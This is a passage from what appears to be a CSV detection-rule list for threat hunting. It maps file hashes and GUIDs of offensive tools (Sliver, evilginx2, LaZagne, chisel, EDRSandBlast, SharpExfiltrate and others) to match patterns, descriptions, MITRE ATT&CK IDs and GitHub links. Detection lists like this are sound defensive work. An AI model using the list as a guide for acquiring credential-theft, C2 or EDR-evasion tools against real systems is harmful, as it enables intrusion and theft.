tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3a1081100f285cef3c41c192d3b6d02f3bfcbc2b591be894f12ede8707b436b4*",".{0,1000}3a1081100f285cef3c41c192d3b6d02f3bfcbc2b591be894f12ede8707b436b4.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*3a2b0667b9d4537180ef1bb22133b58ddb0f6dbd9941e603277d293884c9c2c9*",".{0,1000}3a2b0667b9d4537180ef1bb22133b58ddb0f6dbd9941e603277d293884c9c2c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*",".{0,1000}3A2FCB56\-01A3\-41B3\-BDAA\-B25F45784B23.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*",".{0,1000}3A2FCB56\-01A3\-41B3\-BDAA\-B25F45784B23.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*3a3bd44b20afbb14ce14e70e474491383c2fcc87a554e4fbdc489c65ee7ace2a*",".{0,1000}3a3bd44b20afbb14ce14e70e474491383c2fcc87a554e4fbdc489c65ee7ace2a.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*3a45bdd0bae1a480040acc8ac74814d9abb904240b4c43e2fc8e730c69114fc9*",".{0,1000}3a45bdd0bae1a480040acc8ac74814d9abb904240b4c43e2fc8e730c69114fc9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3a596620516109f4f6d5bfe1b2d38f53f04b60f3fff457573dd506ee981aaea3*",".{0,1000}3a596620516109f4f6d5bfe1b2d38f53f04b60f3fff457573dd506ee981aaea3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3a8e6fe87d5cea3b118aa6b900c63cf7c9d0e4fe3c3bced830861f2835caea33*",".{0,1000}3a8e6fe87d5cea3b118aa6b900c63cf7c9d0e4fe3c3bced830861f2835caea33.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3aa113440e9f684df0d0f889c69ae914a40b07c10a340d1fad4f8365286fe19d*",".{0,1000}3aa113440e9f684df0d0f889c69ae914a40b07c10a340d1fad4f8365286fe19d.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*3aa2845ca86220e20ba6e4f2f08ff1aad9aa4c2cb47c38213bbf21e7fdd87b03*",".{0,1000}3aa2845ca86220e20ba6e4f2f08ff1aad9aa4c2cb47c38213bbf21e7fdd87b03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3ac48e132a8186b8302e04c77c22c4ff2984e6b6bd16bf65361cd1b751559703*",".{0,1000}3ac48e132a8186b8302e04c77c22c4ff2984e6b6bd16bf65361cd1b751559703.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3ac89800bd6dc53207c19d3d35161342cc19bc09a212710393ec9ab79fb55ba1*",".{0,1000}3ac89800bd6dc53207c19d3d35161342cc19bc09a212710393ec9ab79fb55ba1.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*3ADB8BB1-AE14-49DA-A7E1-1C0D9BEB76E9*",".{0,1000}3ADB8BB1\-AE14\-49DA\-A7E1\-1C0D9BEB76E9.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*3b2aea9615c1f94c724af17885c4587e9818652ff92e4debd002522e7be96a58*",".{0,1000}3b2aea9615c1f94c724af17885c4587e9818652ff92e4debd002522e7be96a58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3b486b14426ff6bb3e2c4e9d5d92821a50d5ef26f32e9ba244ca73fdfd81ec66*",".{0,1000}3b486b14426ff6bb3e2c4e9d5d92821a50d5ef26f32e9ba244ca73fdfd81ec66.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3b66b9ef669a7aca55f87ccce04ab1849d23d18c522b5f2514ca0637398ca250*",".{0,1000}3b66b9ef669a7aca55f87ccce04ab1849d23d18c522b5f2514ca0637398ca250.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*3B85D7A9-6BD0-4CD8-9009-36554EF24D32*",".{0,1000}3B85D7A9\-6BD0\-4CD8\-9009\-36554EF24D32.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*3b8b9d91a8ddd3d98da746d79aed9a4f21f5b92eb2ff650e7014f924a0f4c0fc*",".{0,1000}3b8b9d91a8ddd3d98da746d79aed9a4f21f5b92eb2ff650e7014f924a0f4c0fc.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3ba0023aaa84e8e4e063da17b60752631776d3b61646c026cf05c4a1b44c04bf*",".{0,1000}3ba0023aaa84e8e4e063da17b60752631776d3b61646c026cf05c4a1b44c04bf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3BB0CD58-487C-4FEC-8001-607599477158*",".{0,1000}3BB0CD58\-487C\-4FEC\-8001\-607599477158.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","10","2","172","34","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z" "*3bb553cd-0a48-402d-9812-8daff60ac628*",".{0,1000}3bb553cd\-0a48\-402d\-9812\-8daff60ac628.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*3bcdf1c4ea5d312b3cd0fab543836f842e6121997c9ef1ac2c68e68779745213*",".{0,1000}3bcdf1c4ea5d312b3cd0fab543836f842e6121997c9ef1ac2c68e68779745213.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3c27f3968cf79a0b5e9402eea64b259d0b4e22d08932281a20ff9a67a472911c*",".{0,1000}3c27f3968cf79a0b5e9402eea64b259d0b4e22d08932281a20ff9a67a472911c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3c55b7897d676bc6ec3be27026b32389107e2bba443b52f25674fdc7e4229012*",".{0,1000}3c55b7897d676bc6ec3be27026b32389107e2bba443b52f25674fdc7e4229012.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*3C601672-7389-42B2-B5C9-059846E1DA88*",".{0,1000}3C601672\-7389\-42B2\-B5C9\-059846E1DA88.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","0","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*3C8AA457-3659-4CDD-A685-66F7ED10DC4F*",".{0,1000}3C8AA457\-3659\-4CDD\-A685\-66F7ED10DC4F.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05*",".{0,1000}3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*3cc61a5e594a228e108fdbfb991ac45838ad15bf632f112cc185c356889e322d*",".{0,1000}3cc61a5e594a228e108fdbfb991ac45838ad15bf632f112cc185c356889e322d.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*3ccb81e184f94e47a9a7c7e75978ad9eda2850967b0a2e03a505776e4969b8a2*",".{0,1000}3ccb81e184f94e47a9a7c7e75978ad9eda2850967b0a2e03a505776e4969b8a2.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*3cf09d5b03a365d25d2283bfdc5aabda01ae9a6e24147312bcef9b741e25df26*",".{0,1000}3cf09d5b03a365d25d2283bfdc5aabda01ae9a6e24147312bcef9b741e25df26.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3d0ab78d9ceb76cae4a8a600ebfcf3e078ccc5b19038edf73fcf9653f26d7064*",".{0,1000}3d0ab78d9ceb76cae4a8a600ebfcf3e078ccc5b19038edf73fcf9653f26d7064.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*3D111394-E7F7-40B7-91CB-D24374DB739A*",".{0,1000}3D111394\-E7F7\-40B7\-91CB\-D24374DB739A.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*3d165b4880de5247fc9cc4aca2f0d31fc4cfa52fefc08c18e80c3f5b976b545f*",".{0,1000}3d165b4880de5247fc9cc4aca2f0d31fc4cfa52fefc08c18e80c3f5b976b545f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3d27ba8268164db337978538c6e6c33e0b91194d184e6b6b73f1089a425a60f5*",".{0,1000}3d27ba8268164db337978538c6e6c33e0b91194d184e6b6b73f1089a425a60f5.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*3d2b4aa76b770b3421f0867aa68b42a1a17f723df251d81af9459f3a872a6fc4*",".{0,1000}3d2b4aa76b770b3421f0867aa68b42a1a17f723df251d81af9459f3a872a6fc4.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*3d63505863fa5f18ff990c4686a21d17fd618da9ca2490c22d0f7f5045f3581f*",".{0,1000}3d63505863fa5f18ff990c4686a21d17fd618da9ca2490c22d0f7f5045f3581f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3d770299898ab069e0a7f139ed0659991feeb17f73e55b398bf982932c200ef9*",".{0,1000}3d770299898ab069e0a7f139ed0659991feeb17f73e55b398bf982932c200ef9.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*3d86ecb9e14e7d1a86e16fa28b61fed96ca5bb9dccbfc1c2f8d1231325755ef1*",".{0,1000}3d86ecb9e14e7d1a86e16fa28b61fed96ca5bb9dccbfc1c2f8d1231325755ef1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3d99d90feac8540dcb9639318d5e3ef96726b11f58d418d08023117ff7fcd9fc*",".{0,1000}3d99d90feac8540dcb9639318d5e3ef96726b11f58d418d08023117ff7fcd9fc.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3d9b9f20cf22e17016d2e46bbf85f4e1dbb605959e8ed288bac7daf67cbff731*",".{0,1000}3d9b9f20cf22e17016d2e46bbf85f4e1dbb605959e8ed288bac7daf67cbff731.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3da905463c66fecfe69d608e98c6cd1defda607d176a73f2b38192a79db3fc65*",".{0,1000}3da905463c66fecfe69d608e98c6cd1defda607d176a73f2b38192a79db3fc65.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*3da9c10c87a3f8b9964462299ea2edd92c3b82ed00e412e36a7a4a854b76079c*",".{0,1000}3da9c10c87a3f8b9964462299ea2edd92c3b82ed00e412e36a7a4a854b76079c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3daf3c3717e738b47246b5fb7106b8b62e374ffc79a1f824eb5aaaec2fbdc27c*",".{0,1000}3daf3c3717e738b47246b5fb7106b8b62e374ffc79a1f824eb5aaaec2fbdc27c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*3db93e0b8f7b39335bfa3f1712a38b8f0e21210772eec85524941e420e9e58ff*",".{0,1000}3db93e0b8f7b39335bfa3f1712a38b8f0e21210772eec85524941e420e9e58ff.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*3df5882d88914a064cbba240e1b3615c69c432f807f949a80d0d4b5a9f44ef77*",".{0,1000}3df5882d88914a064cbba240e1b3615c69c432f807f949a80d0d4b5a9f44ef77.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*3e02ce91331011e03e8de89723c52367ff14d75f7f81b94ad3741f9cc56c5736*",".{0,1000}3e02ce91331011e03e8de89723c52367ff14d75f7f81b94ad3741f9cc56c5736.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*3e3e74bdc2c23c8b8e6d177588d7d4d371f63b10aec638126c8ecb117579ba11*",".{0,1000}3e3e74bdc2c23c8b8e6d177588d7d4d371f63b10aec638126c8ecb117579ba11.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 